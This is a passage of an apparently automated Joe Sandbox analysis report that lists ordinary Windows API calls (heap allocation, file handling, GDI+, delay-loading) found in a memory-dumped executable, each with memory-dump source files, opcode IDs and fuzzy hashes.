                                                                                      • Instruction Fuzzy Hash: A6118273A50529ABCF12AF68DC969DEB736FF48740F448525FC19B7221EA309C1087B0
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,00D923AA,?,0000015D,?,?,?,?,00D92F29,000000FF,00000000,?,?), ref: 00D95A2E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: cc2550cbeacabc985f88e6f3733e65e2b35380c32e56cfcf14b0f46c5d9fea01
                                                                                      • Instruction ID: ca9b6ae4483df8eb441445818eb9bc96ebc9fc4a5c3fa963fc62e0d51f7a3e6d
                                                                                      • Opcode Fuzzy Hash: cc2550cbeacabc985f88e6f3733e65e2b35380c32e56cfcf14b0f46c5d9fea01
                                                                                      • Instruction Fuzzy Hash: 75E0E531141A215AEF332B61BC42B5A3648EF113A4F090330BC0696198CB31EC0143BC
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D75B3A
                                                                                        • Part of subcall function 00D7AC66: __EH_prolog.LIBCMT ref: 00D7AC6B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: eceadb9d1162091986880e2d5be269782890fba15e7d59a12775e7e31ca84dfb
                                                                                      • Instruction ID: 89fd62af7f674fb750a75231c5773465c66cdd635beec110b5d6cc677ae01400
                                                                                      • Opcode Fuzzy Hash: eceadb9d1162091986880e2d5be269782890fba15e7d59a12775e7e31ca84dfb
                                                                                      • Instruction Fuzzy Hash: 83014B34904785DACB25E7A8D4557EDB7E4DB56304F40C0ADAC5D53282EBB42B08A773
                                                                                      APIs
                                                                                      • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D7A174
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseFind
                                                                                      • String ID:
                                                                                      • API String ID: 1863332320-0
                                                                                      • Opcode ID: 9d1ab9b9ae366b16f744061ba7cb9696aafb6369884e07efbf530a5b7d01c4c6
                                                                                      • Instruction ID: e2acae4c6eeeae6aae84edbcffa0fb9244e2053b013f6bf271062f14eb4d3dcb
                                                                                      • Opcode Fuzzy Hash: 9d1ab9b9ae366b16f744061ba7cb9696aafb6369884e07efbf530a5b7d01c4c6
                                                                                      • Instruction Fuzzy Hash: 85F0E232409380EEDE229BB88805BCFBB909F46331F04CA49F5FD42192D27550858733
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D71E93
                                                                                        • Part of subcall function 00D718F6: __EH_prolog.LIBCMT ref: 00D718FB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: a7a813fedcd63dc8f3b543698381bd09c0d1850705d4613e7a27206a65b13dd3
                                                                                      • Instruction ID: 5cd1baf3a1865dc6d40fb121df5d0e323bd852255ab33f658f1eaeb656c609cd
                                                                                      • Opcode Fuzzy Hash: a7a813fedcd63dc8f3b543698381bd09c0d1850705d4613e7a27206a65b13dd3
                                                                                      • Instruction Fuzzy Hash: C6F07FB1D112999ECF41EFA898456EEBBB5FB18300F1442BAE419E7202E7355A048BB1
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D71E93
                                                                                        • Part of subcall function 00D718F6: __EH_prolog.LIBCMT ref: 00D718FB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
                                                                                      • Instruction ID: dee17ed370d67eb83122d57f3bca8c2255cb4dae58460c117e48926600c51b36
                                                                                      • Opcode Fuzzy Hash: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
                                                                                      • Instruction Fuzzy Hash: 89F092B1C112999ECF41EFA8C8456EEBBF5FB18300F1442BAD409E7202E7355604CBA1
                                                                                      APIs
                                                                                      • SetThreadExecutionState.KERNEL32(00000001), ref: 00D7F927
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExecutionStateThread
                                                                                      • String ID:
                                                                                      • API String ID: 2211380416-0
                                                                                      • Opcode ID: 07c28294e20dfa31d49eb27096ed032a1a0f2370ea7936acb3bcfd1b49cf32fb
                                                                                      • Instruction ID: 3eb4f0c8f4dc93f23564a7e0dacaf0a95c3c20d88b92d9af6152acbe8ecd9c89
                                                                                      • Opcode Fuzzy Hash: 07c28294e20dfa31d49eb27096ed032a1a0f2370ea7936acb3bcfd1b49cf32fb
                                                                                      • Instruction Fuzzy Hash: 03D0C25031421026D63133286806BBD19078FCB320F094036B108923D2FA45485AA2F2
                                                                                      APIs
                                                                                      • GdipAlloc.GDIPLUS(00000010), ref: 00D88B6B
                                                                                        • Part of subcall function 00D88924: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D88945
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                      • String ID:
                                                                                      • API String ID: 1915507550-0
                                                                                      • Opcode ID: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                                                                      • Instruction ID: 85a8c35c879e74609115719707c16e08df10062595880c9249f6f482a5a0cbbb
                                                                                      • Opcode Fuzzy Hash: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                                                                      • Instruction Fuzzy Hash: 44D0A77060010CBBDF507E618C0297DBAD8DB41390F848135BC0496150EE72ED117771
                                                                                      APIs
                                                                                      • GetFileType.KERNELBASE(000000FF,00D7964C), ref: 00D79726
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileType
                                                                                      • String ID:
                                                                                      • API String ID: 3081899298-0
                                                                                      • Opcode ID: dbcd1c53a21abc35dc6e448362e4e88013c482f8a56566ffd26d8742712da74f
                                                                                      • Instruction ID: ce54b454ad704a3cb8d42b2c0147650ad2bd07e4ea00fe25e2b1469e50348282
                                                                                      • Opcode Fuzzy Hash: dbcd1c53a21abc35dc6e448362e4e88013c482f8a56566ffd26d8742712da74f
                                                                                      • Instruction Fuzzy Hash: 5FD01232031240958E790E385D29066AA619B433A6B3CDAE4E06DC40A1E722C843F551
                                                                                      APIs
                                                                                      • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00D8BF9C
                                                                                        • Part of subcall function 00D8991E: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D8992F
                                                                                        • Part of subcall function 00D8991E: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D89940
                                                                                        • Part of subcall function 00D8991E: TranslateMessage.USER32(?), ref: 00D8994A
                                                                                        • Part of subcall function 00D8991E: DispatchMessageW.USER32(?), ref: 00D89954
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$DispatchItemPeekSendTranslate
                                                                                      • String ID:
                                                                                      • API String ID: 4142818094-0
                                                                                      • Opcode ID: 646f1b4e6b3f10567c2920ed1f51509e6cefdc73aadb111a0e96b02156015773
                                                                                      • Instruction ID: 905c30c93b2cf25aa30e5289a6b952b1558773607d93e6e3823b4d72f7d35dc1
                                                                                      • Opcode Fuzzy Hash: 646f1b4e6b3f10567c2920ed1f51509e6cefdc73aadb111a0e96b02156015773
                                                                                      • Instruction Fuzzy Hash: D5D09E32144301EAD6113B51CD06F1ABAA2FB8CB04F004A58B284740B1C6629D30EB32
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C799
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 56c32fef0abab804ad4231ee43e33fa4836654294402f756f4f0ba7db26d5148
                                                                                      • Instruction ID: 65660d52748c95765ac5b59fbc44367a2563ab03cd8d88a72835b75e52b13029
                                                                                      • Opcode Fuzzy Hash: 56c32fef0abab804ad4231ee43e33fa4836654294402f756f4f0ba7db26d5148
                                                                                      • Instruction Fuzzy Hash: EFB012912BD002ED3148F2089D02D37010DC0C2B10330D51FF841C1340E9944C5D9236
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C799
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 2eded0b64ca0776c40088182a90b4e26b282bac7e7e3b2243a80d99150d11727
                                                                                      • Instruction ID: 7c0c4cbc39349cc10071c0bba226fc8f32541ab72b0e1d149a4c6320fca1ed79
                                                                                      • Opcode Fuzzy Hash: 2eded0b64ca0776c40088182a90b4e26b282bac7e7e3b2243a80d99150d11727
                                                                                      • Instruction Fuzzy Hash: 03B01291279102FD3148B2045C42C37010DC0C3B10330D51FFC41C0240EA904C5C9136
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C799
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: c4462cf333744aff496f6ce34c03739914bbf8627dd1b240013270dc1c735595
                                                                                      • Instruction ID: c96af21de2e0ec2aea80e3af0f993566472b8a62af5b0e51ccb7e9654ca3a9d4
                                                                                      • Opcode Fuzzy Hash: c4462cf333744aff496f6ce34c03739914bbf8627dd1b240013270dc1c735595
                                                                                      • Instruction Fuzzy Hash: CDB01291279105ED3188F3095C02D37110CD0C2B10330D51FF840C0340E9A04C58933A
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C738
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 74b8b9cc17004f03e95a0e14bab18eb78fa4d7f2511e368b09412b9029852df5
                                                                                      • Instruction ID: 6dbf796c5c0a2573ec390f61ec58bc7235209ab50fdc78606b23bec2b8e275fc
                                                                                      • Opcode Fuzzy Hash: 74b8b9cc17004f03e95a0e14bab18eb78fa4d7f2511e368b09412b9029852df5
                                                                                      • Instruction Fuzzy Hash: 71B01292279201ED3148F3587F02D37014CC0C2F10330551FF800C0240F9544C059732
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C738
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 3ad0c7c185a6ef0814fe0047962ca8344151506b8f015047b45f485f9b35bc61
                                                                                      • Instruction ID: 717c2cdbff16ffd6e6162027173867edd4d3c2e332f8ed2602e6e0d046275df3
                                                                                      • Opcode Fuzzy Hash: 3ad0c7c185a6ef0814fe0047962ca8344151506b8f015047b45f485f9b35bc61
                                                                                      • Instruction Fuzzy Hash: 2FB01292279101EC3248F3582D02D37014CC0C2F10330951FFC00C0240E9504C049732
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C738
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
